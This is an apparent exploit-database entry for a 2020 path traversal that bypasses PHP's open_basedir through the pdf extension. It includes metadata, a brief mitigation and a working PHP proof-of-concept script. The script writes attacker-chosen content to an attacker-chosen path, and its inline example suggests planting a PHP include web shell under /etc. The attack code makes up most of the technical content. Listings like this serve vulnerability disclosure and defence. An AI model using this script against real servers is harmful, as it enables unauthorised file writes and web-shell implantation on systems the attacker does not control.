header-logo
Suggest Exploit
vendor:
PHP
by:
Sina Yazdanmehr
7.5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Path Traversal Vulnerability in PHP

Via this bug, an attacker can save a file in a path that is not allowed in open_basedir. Reproduce code is provided which takes two parameters, 'p' and 'v', where 'p' is the path that the attacker wants to save the file in and 'v' is the text that the attacker wants to save in the file. When the code is run, a file is created in the path specified by the attacker with the value specified by the attacker.

Mitigation:

Ensure that open_basedir is properly configured and that the web server is not vulnerable to path traversal attacks.
Source

Exploit-DB raw data:

Description:
------------
Via this bug , attacker can save a file in path that not allowed in
open_basedir .

Reproduce code:
---------------
<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
   die('pdf extension required .');   
}else{
    $__PATH = $_GET['p']; /*The path that u want save file in .ex:
/etc/file.php*/
    $__VALUE = $_GET['v']; /*The text that u want save in file .ex:
<?php include $_GET[f];?>*/
    if(!isset($__PATH,$__VALUE)){
       
die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_sav
e_in_file]');
    }
    $__IRCRASH = pdf_new();
    pdf_open_file($__IRCRASH,$__PATH);
    pdf_begin_page($__IRCRASH,612,792);
   
pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
    pdf_end_page($__IRCRASH);
    pdf_close($__IRCRASH);
    pdf_delete($__IRCRASH);
    print('<p>IrCrash Security Team .</p>');
    print('<p>' . $__PATH . "\n"  . 'created .</p>');}
?>

Expected result:
----------------
When attacker run this code , a file in a path that attacker input in
`p` in url , whith value that attacker input in `v` in url.

Navigation

Suggest Exploit

Services By CQR